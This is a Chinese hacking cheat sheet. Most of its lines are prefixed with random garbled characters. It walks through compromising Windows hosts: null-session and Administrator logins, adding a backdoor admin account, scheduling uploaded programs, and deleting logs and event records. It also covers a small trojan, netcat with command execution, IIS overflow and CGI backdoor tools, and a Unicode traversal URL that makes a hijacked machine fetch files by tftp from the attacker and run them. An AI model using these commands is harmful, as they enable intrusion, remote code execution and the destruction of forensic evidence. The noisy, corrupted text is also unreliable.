网管和黑客都必须知道的命令
(lieiye^ 常用的几条NET命令:
2|$lk8 /, T7^ulG1' (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
A"0wvk)UcY J
&{qppN (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
_IC,9bbg /z..5r^,ZZ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
.r7D)xNa@ Q6eN+i2 ; (查看远程主机时间) net time \\IP地址
>1m)%zt xnT3^ #-h (定时启动某个程序) at \\IP地址 02:18 readme.exe
" \`BPN - J{Dxz (查看共享) net view \\IP地址
{3.*7gnY\L |OOXh[y (查看netbios工作组列表) nbtstat -A IP地址
Td5bDO v'h3CaA9j (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
7Nd*,DV_ T=^jCH & (这两条把自己增加到管理员组): net user 用户名 密码 /add
FPvuzBJ (%6(5,
net localgroup Administrators 用户名 /add
#"hJpyW 4V 7[4_+Q:} (断开连接) net use \\IP地址\ipc$ /delete
^GE^Q\&D& )\0Ug7]? 扫尾:
^WmGo]<B_ \5t`p67Ve_ del C:\winnt\system32\logfiles\*.*
V+peO D&4u63^ del C:\winnt\ssytem32\config\*.evt
D~5yj&&T; sKe, del C:\winnt\system32\dtclog\*.*
? 7/W> 3fm;r5 del C:\winnt\system32\*.log
'`9%'f) 3%_
4+zd del C:\winnt\system32\*.txt
U)u\1AV5 <9ePi9D( del C:\winnt\*.txt
Sjw2 j#Q N 9c8c del C:\winnt\*.log
:a#F umZlIH[7 一、netsvc.exe
P4hZB_.= fL(':W&n- 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
5ze`IY P{"WlJ netsvc /list \\IP地址
0[V&8\S~'T &7$,<9. netsvc schedule \\IP地址 /query
D/gd kuWK/6l4 netsvc \\IP地址 schedule /start
)?F$-~7 NQDLI 1o 二、OpenTelnet.exe
kX@bv"i K~`n}_: 远程启动主机的Telnet服务,并绑定端口到7878,例如:
#DQX<:u /!^L69um OpenTelnet \\IP地址 用户名 密码 1 7878
o9_(DJ<{ _Wm(/ +G_| 然后就可以telnet到主机的7878端口,进入DOS方式下:
ls [Ls N8,EI^W8Z telnet IP地址 7878
X!,#'&p& Sg/:n,68 三、winshell.exe
!S~,>,yd O3_D~O
." 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
_L?v6MTj b ^uP^](J p Path (查看winshell主程序的路径信息)
>r;ABz/ R#"U/8b>z b reBoot (重新启动机器)
%T`4!:vy q:TZ=bs^ d shutDown (关闭机器)
fn1 ?Qp|
H;b8I s Shell (执行后你就会看到可爱的“C:\>”)
tn"Y9
k| ATKYjhc _ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
^zvA?'s JN{<oxI CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
:hC
{5!| v9Z lNA7m! 四、3389登陆器,GUI方式登录远程主机的
1 ;_{US5FR g,00'z_D 五、elsave.exe
jf$JaY bHhC56[M 事件日志清除工具
,"P5D&,_ S1D9AcK elsave -s \\IP地址 -l "application" -C
% MfGVx}nG 1bV 2 elsave -s \\IP地址 -l "system" -C
w^ixMn~nLF k)N2 +/ elsave -s \\IP地址 -l "security" -C
<bEN8b n%83jep9 执行后成功清除应用程序日志,系统日志,安全日志
E\{^0vNc Vpug"aR&_ 六、hbulot.exe
kV*y_5g u}JQTro 开启win2kserver和winxp的3389服务
mr:kn0 ^/_\etV hbulot [/r]
M[:O( F,'^se4& 使用/r表示安装完成后自动重起目标使设置生效。
ddUjs8VvJ 2x)0?N[$O 七、nc.exe(netcat.exe)
,H.(\p_N PY^^^01P 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
8C*6Fjb# J>HLQP 想要连接到某处: nc [-options] hostname port[s] [ports] ...
Ck ~V5 ^/`#9]<% 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
PphR4 sIM Eg@R[ ^T 参数:
>u BV ?;0nJf -e prog 程序重定向,一旦连接,就执行 [危险!!]
Bxn8>< pr0@sri@ -g gateway source-routing hop point[s], up to 8
c[wQJc ATYQ6E[{MV -G num source-routing pointer: 4, 8, 12, ...
AIvL#12 p?dGZ2` [I -h 帮助信息
8\qCj.>S &[?u1qQ%o -i secs 延时的间隔
7h9 fQ&y
At`1) -l 监听模式,用于入站连接
% j[O&[s}
hRuo,FS#: -n 指定数字的IP地址,不能用hostname
!.;xt L "TBQNWZ -o file 记录16进制的传输
iF#}t(CrH &rl]$Mtt -p port 本地端口号
;kyL>mV{ }S~ysQwT -r 任意指定本地及远程端口
p|bc=`TD ,<uiitOo -s addr 本地源地址
l5\B2 +}7 U /1[~429 -u UDP模式
mV:RmA (ybtXoQs -v 详细输出——用两个-v可得到更详细的内容
br34Eh O?C-nw6kP -w secs timeout的时间
Sy+]SeF& Uy$U8b-ov -z 将输入输出关掉——用于扫描时
!7IT~pO` 八、TFTPD32.EXE
}5o~R~H U:mq7Rd8 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
\U)2
Tg @yU!sE: http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
h}anTFKP GvZac 然后可以直接令文件运行:
RvyBg:Aj5 t_dw}I http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
?l\gh1{C %#Wg^l
' 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
.T#y N\S1 #q~3c;ec 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
*! r\GGb :Fi%Cef| 一、一 Xscan命令行运行参数说明:
\J,- <wF xY\*L:TwW 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
h9Tf@]W
Y2=Brtc[@ 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
NgE&KPj\ F(KH- xscan -file <主机列表文件名> <检测项目> [其他选项]
SCfkv|hO }Ke}rM< 其中<检测项目> 含义如下:
S1H47<)UF zulf%aaL -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
a O"nD_7 YmO"EWb -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
7U{b+=,wK i">z8?qF -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
hVT=j ?~ DSDl[;3O{s -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
D<_,>{$gW 5,0wj0l -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
E+^} B/"
T}w*K[z
$ [其他选项] 含义如下:
Zv1Bju*y 7'{Yz -v: 显示详细扫描进度
@ V7ooo! Z5*(W;; -p: 跳过Ping不通的主机
}GoOE=rhY P[#WHbn -o: 跳过没有检测到开放端口的主机
GqIvvnw@f _ pH6uuB -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10